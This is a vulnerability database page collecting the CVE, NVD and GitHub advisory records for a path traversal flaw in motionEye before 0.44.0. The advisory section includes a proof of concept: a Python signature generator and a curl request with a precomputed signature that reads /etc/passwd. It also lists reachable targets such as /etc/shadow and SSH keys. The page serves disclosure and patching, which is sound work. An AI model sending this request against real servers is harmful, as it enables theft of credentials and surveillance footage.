CVE-2026-31978 (GCVE-0-2026-31978)
Vulnerability from cvelistv5 – Published: 2026-06-24 20:28 – Updated: 2026-06-24 20:28
VLAI
Title
motionEye: Arbitrary File Read via Path Traversal in Picture/Movie Preview Endpoint
Summary
motionEye (mEye) is an online interface for motion software, which is a video surveillance program with motion detection. Versions prior to 0.44.0 are vulnerable to path traversal in the picture and movie API endpoints, suhc as /picture/{id}/preview/{filename}. Neither the API handlers, nor the mediafiles.py functions such as get_media_preview() check for .. sequences in the filename parameter, except for get_media_content(). This allows an authenticated user with normal (non-admin) privileges to read arbitrary files from the filesystem as the motionEye process user, such as: /etc/passwd, /etc/shadow, motionEye config files containing password hashes and plaintext passwords, SSH keys, and other cameras' surveillance footage. This issue has been fixed in version 0.44.0.
Severity
6.5 (Medium)
CWE
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://github.com/motioneye-project/motioneye/se… | x_refsource_CONFIRM |
| https://github.com/motioneye-project/motioneye/re… | x_refsource_MISC |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| motioneye-project | motioneye |
Affected:
< 0.44.0
|
{
"containers": {
"cna": {
"affected": [
{
"product": "motioneye",
"vendor": "motioneye-project",
"versions": [
{
"status": "affected",
"version": "\u003c 0.44.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "motionEye (mEye) is an online interface for motion software, which is a video surveillance program with motion detection. Versions prior to 0.44.0 are vulnerable to path traversal in the picture and movie API endpoints, suhc as /picture/{id}/preview/{filename}. Neither the API handlers, nor the mediafiles.py functions such as get_media_preview() check for .. sequences in the filename parameter, except for get_media_content(). This allows an authenticated user with normal (non-admin) privileges to read arbitrary files from the filesystem as the motionEye process user, such as: /etc/passwd, /etc/shadow, motionEye config files containing password hashes and plaintext passwords, SSH keys, and other cameras\u0027 surveillance footage. This issue has been fixed in version 0.44.0."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-22",
"description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-284",
"description": "CWE-284: Improper Access Control",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-06-24T20:28:24.286Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/motioneye-project/motioneye/security/advisories/GHSA-g9fx-5r4h-pcw3",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/motioneye-project/motioneye/security/advisories/GHSA-g9fx-5r4h-pcw3"
},
{
"name": "https://github.com/motioneye-project/motioneye/releases/tag/0.44.0",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/motioneye-project/motioneye/releases/tag/0.44.0"
}
],
"source": {
"advisory": "GHSA-g9fx-5r4h-pcw3",
"discovery": "UNKNOWN"
},
"title": "motionEye: Arbitrary File Read via Path Traversal in Picture/Movie Preview Endpoint"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-31978",
"datePublished": "2026-06-24T20:28:24.286Z",
"dateReserved": "2026-03-10T15:40:10.487Z",
"dateUpdated": "2026-06-24T20:28:24.286Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
FKIE_CVE-2026-31978
Vulnerability from fkie_nvd - Published: 2026-06-24 21:16 - Updated: 2026-06-24 21:16
Severity
Summary
motionEye (mEye) is an online interface for motion software, which is a video surveillance program with motion detection. Versions prior to 0.44.0 are vulnerable to path traversal in the picture and movie API endpoints, suhc as /picture/{id}/preview/{filename}. Neither the API handlers, nor the mediafiles.py functions such as get_media_preview() check for .. sequences in the filename parameter, except for get_media_content(). This allows an authenticated user with normal (non-admin) privileges to read arbitrary files from the filesystem as the motionEye process user, such as: /etc/passwd, /etc/shadow, motionEye config files containing password hashes and plaintext passwords, SSH keys, and other cameras' surveillance footage. This issue has been fixed in version 0.44.0.
References
Impacted products
| Vendor | Product | Version |
|---|
{
"affected": [
{
"affectedData": [
{
"product": "motioneye",
"vendor": "motioneye-project",
"versions": [
{
"status": "affected",
"version": "\u003c 0.44.0"
}
]
}
],
"source": "security-advisories@github.com"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "motionEye (mEye) is an online interface for motion software, which is a video surveillance program with motion detection. Versions prior to 0.44.0 are vulnerable to path traversal in the picture and movie API endpoints, suhc as /picture/{id}/preview/{filename}. Neither the API handlers, nor the mediafiles.py functions such as get_media_preview() check for .. sequences in the filename parameter, except for get_media_content(). This allows an authenticated user with normal (non-admin) privileges to read arbitrary files from the filesystem as the motionEye process user, such as: /etc/passwd, /etc/shadow, motionEye config files containing password hashes and plaintext passwords, SSH keys, and other cameras\u0027 surveillance footage. This issue has been fixed in version 0.44.0."
}
],
"id": "CVE-2026-31978",
"lastModified": "2026-06-24T21:16:53.043",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-06-24T21:16:53.043",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/motioneye-project/motioneye/releases/tag/0.44.0"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/motioneye-project/motioneye/security/advisories/GHSA-g9fx-5r4h-pcw3"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Received",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-22"
},
{
"lang": "en",
"value": "CWE-284"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
GHSA-G9FX-5R4H-PCW3
Vulnerability from github – Published: 2026-06-22 17:10 – Updated: 2026-06-22 17:10
VLAI
Summary
motionEye has an Arbitrary File Read via Path Traversal in Picture/Movie Preview Endpoint
Details
Summary
motionEye v0.43.1 (latest stable) is vulnerable to path traversal in the picture and movie API endpoints, like /picture/{id}/preview/{filename}. Neither the API handlers, nor the mediafiles.py functions like get_media_preview() check for .. sequences in the filename parameter, except get_media_content() which does. This allows an authenticated user with normal (non-admin) privileges to read arbitrary files from the filesystem as the motionEye process user.
Details
The get_media_content() function properly validates the path:
# mediafiles.py ~line 506 — SAFE
def get_media_content(camera_config, path, media_type):
target_dir = camera_config['target_dir']
full_path = os.path.join(target_dir, path)
if '..' in path: # <-- PATH TRAVERSAL CHECK PRESENT
return None
...
But get_media_preview() does NOT:
# mediafiles.py ~line 910 — VULNERABLE
def get_media_preview(camera_config, path, media_type, ...):
target_dir = camera_config['target_dir']
full_path = os.path.join(target_dir, path)
# <-- NO '..' CHECK
...
Similarly, del_media_content() at line ~865 is also missing the check. This is a classic inconsistent fix pattern.
The exploit requires %2F-encoded slashes (..%2F..%2F) which Tornado's URL router does NOT normalize — it passes the raw ../ through to os.path.join().
PoC
Step 1: Authenticate as any user (normal or admin).
Step 2: Compute the request signature. motionEye uses HMAC-style signatures for API authentication. The signature is SHA1("GET:<path>?_username=<user>::<password>"). With the default empty admin password:
#!/usr/bin/env python3
"""Signature generator for motionEye path traversal PoC"""
import hashlib, re, urllib.parse
_SIGNATURE_REGEX = re.compile(r'[^A-Za-z0-9/?_.=&{}\[\]\":, -]', re.DOTALL)
def compute_signature(method, path, key=''):
parts = list(urllib.parse.urlsplit(path))
query = [q for q in urllib.parse.parse_qsl(parts[3], keep_blank_values=True) if q[0] != '_signature']
query.sort(key=lambda q: q[0])
query = [(n, urllib.parse.quote(v, safe="!'()*~")) for (n, v) in query]
query = '&'.join([(q[0] + '=' + q[1]) for q in query])
parts[0] = parts[1] = ''
parts[3] = query
path = urllib.parse.urlunsplit(parts)
path = _SIGNATURE_REGEX.sub('-', path)
key = _SIGNATURE_REGEX.sub('-', key)
return hashlib.sha1(('{}:{}:{}:{}'.format(method, path, '', key)).encode('utf-8')).hexdigest().lower()
path = '/picture/1/preview/..%2F..%2F..%2F..%2Fetc%2Fpasswd?_username=admin'
sig = compute_signature('GET', path)
print(f'Signature: {sig}')
print(f'curl --path-as-is -s "http://TARGET:8765/{path}&_signature={sig}"')
Step 3: Send the request using curl --path-as-is (the --path-as-is flag is required — without it, curl normalizes ..%2F and collapses the traversal before sending):
# With default empty admin password, the signature is static:
curl --path-as-is -s "http://localhost:8766/picture/1/preview/..%2F..%2F..%2F..%2Fetc%2Fpasswd?_username=admin&_signature=8b387100a519c617bdd66fe629d14b05e09c6e0c"
Step 4: The server returns the contents of /etc/passwd.
Verified output:
Note on the signature value: The signature
8b387100a519c617bdd66fe629d14b05e09c6e0cis valid for the default empty admin password. If the admin password has been changed, regenerate the signature using the Python script above with the correct password passed as thekeyparameter.
Impact
An authenticated user (normal or admin) can read arbitrary files from the server, including:
/etc/passwd— user enumeration/etc/motioneye/motion.conf— admin password hash, surveillance password in plaintext/etc/shadow— password hashes (if running as root, which is default in Docker)- SSH keys, environment variables, and other sensitive configuration files
- Surveillance footage from other cameras
Severity
6.5 (Medium)
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "motioneye"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.44.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-31978"
],
"database_specific": {
"cwe_ids": [
"CWE-22",
"CWE-284"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-22T17:10:38Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Summary\n\nmotionEye v0.43.1 (latest stable) is vulnerable to path traversal in the picture and movie API endpoints, like `/picture/{id}/preview/{filename}`. Neither the API handlers, nor the `mediafiles.py` functions like `get_media_preview()` check for `..` sequences in the filename parameter, except `get_media_content()` which does. This allows an authenticated user with normal (non-admin) privileges to read arbitrary files from the filesystem as the motionEye process user.\n\n### Details\n\nThe `get_media_content()` function properly validates the path:\n\n```python\n# mediafiles.py ~line 506 \u2014 SAFE\ndef get_media_content(camera_config, path, media_type):\n target_dir = camera_config[\u0027target_dir\u0027]\n full_path = os.path.join(target_dir, path)\n\n if \u0027..\u0027 in path: # \u003c-- PATH TRAVERSAL CHECK PRESENT\n return None\n ...\n```\n\nBut `get_media_preview()` does NOT:\n\n```python\n# mediafiles.py ~line 910 \u2014 VULNERABLE\ndef get_media_preview(camera_config, path, media_type, ...):\n target_dir = camera_config[\u0027target_dir\u0027]\n full_path = os.path.join(target_dir, path)\n # \u003c-- NO \u0027..\u0027 CHECK\n ...\n```\n\nSimilarly, `del_media_content()` at line ~865 is also missing the check. This is a classic inconsistent fix pattern.\n\nThe exploit requires `%2F`-encoded slashes (`..%2F..%2F`) which Tornado\u0027s URL router does NOT normalize \u2014 it passes the raw `../` through to `os.path.join()`.\n\n### PoC\n\n**Step 1:** Authenticate as any user (normal or admin).\n\n**Step 2:** Compute the request signature. motionEye uses HMAC-style signatures for API authentication. The signature is `SHA1(\"GET:\u003cpath\u003e?_username=\u003cuser\u003e::\u003cpassword\u003e\")`. With the default empty admin password:\n\n```python\n#!/usr/bin/env python3\n\"\"\"Signature generator for motionEye path traversal PoC\"\"\"\nimport hashlib, re, urllib.parse\n\n_SIGNATURE_REGEX = re.compile(r\u0027[^A-Za-z0-9/?_.=\u0026{}\\[\\]\\\":, -]\u0027, re.DOTALL)\n\ndef compute_signature(method, path, key=\u0027\u0027):\n parts = list(urllib.parse.urlsplit(path))\n query = [q for q in urllib.parse.parse_qsl(parts[3], keep_blank_values=True) if q[0] != \u0027_signature\u0027]\n query.sort(key=lambda q: q[0])\n query = [(n, urllib.parse.quote(v, safe=\"!\u0027()*~\")) for (n, v) in query]\n query = \u0027\u0026\u0027.join([(q[0] + \u0027=\u0027 + q[1]) for q in query])\n parts[0] = parts[1] = \u0027\u0027\n parts[3] = query\n path = urllib.parse.urlunsplit(parts)\n path = _SIGNATURE_REGEX.sub(\u0027-\u0027, path)\n key = _SIGNATURE_REGEX.sub(\u0027-\u0027, key)\n return hashlib.sha1((\u0027{}:{}:{}:{}\u0027.format(method, path, \u0027\u0027, key)).encode(\u0027utf-8\u0027)).hexdigest().lower()\n\npath = \u0027/picture/1/preview/..%2F..%2F..%2F..%2Fetc%2Fpasswd?_username=admin\u0027\nsig = compute_signature(\u0027GET\u0027, path)\nprint(f\u0027Signature: {sig}\u0027)\nprint(f\u0027curl --path-as-is -s \"http://TARGET:8765/{path}\u0026_signature={sig}\"\u0027)\n```\n\n**Step 3:** Send the request using `curl --path-as-is` (the `--path-as-is` flag is **required** \u2014 without it, curl normalizes `..%2F` and collapses the traversal before sending):\n\n```bash\n# With default empty admin password, the signature is static:\ncurl --path-as-is -s \"http://localhost:8766/picture/1/preview/..%2F..%2F..%2F..%2Fetc%2Fpasswd?_username=admin\u0026_signature=8b387100a519c617bdd66fe629d14b05e09c6e0c\"\n```\n\n**Step 4:** The server returns the contents of `/etc/passwd`.\n\n**Verified output:**\n\n\u003cimg width=\"1743\" height=\"410\" alt=\"etc_passwd\" src=\"https://github.com/user-attachments/assets/30ec85f7-4fe7-4d3b-ae23-1d02c3ecad64\" /\u003e\n\n\u003e **Note on the signature value:** The signature `8b387100a519c617bdd66fe629d14b05e09c6e0c` is valid for the default empty admin password. If the admin password has been changed, regenerate the signature using the Python script above with the correct password passed as the `key` parameter.\n\n### Impact\n\nAn authenticated user (normal or admin) can read arbitrary files from the server, including:\n\n- `/etc/passwd` \u2014 user enumeration\n- `/etc/motioneye/motion.conf` \u2014 admin password hash, surveillance password in plaintext\n- `/etc/shadow` \u2014 password hashes (if running as root, which is default in Docker)\n- SSH keys, environment variables, and other sensitive configuration files\n- Surveillance footage from other cameras",
"id": "GHSA-g9fx-5r4h-pcw3",
"modified": "2026-06-22T17:10:38Z",
"published": "2026-06-22T17:10:38Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/motioneye-project/motioneye/security/advisories/GHSA-g9fx-5r4h-pcw3"
},
{
"type": "PACKAGE",
"url": "https://github.com/motioneye-project/motioneye"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "motionEye has an Arbitrary File Read via Path Traversal in Picture/Movie Preview Endpoint"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…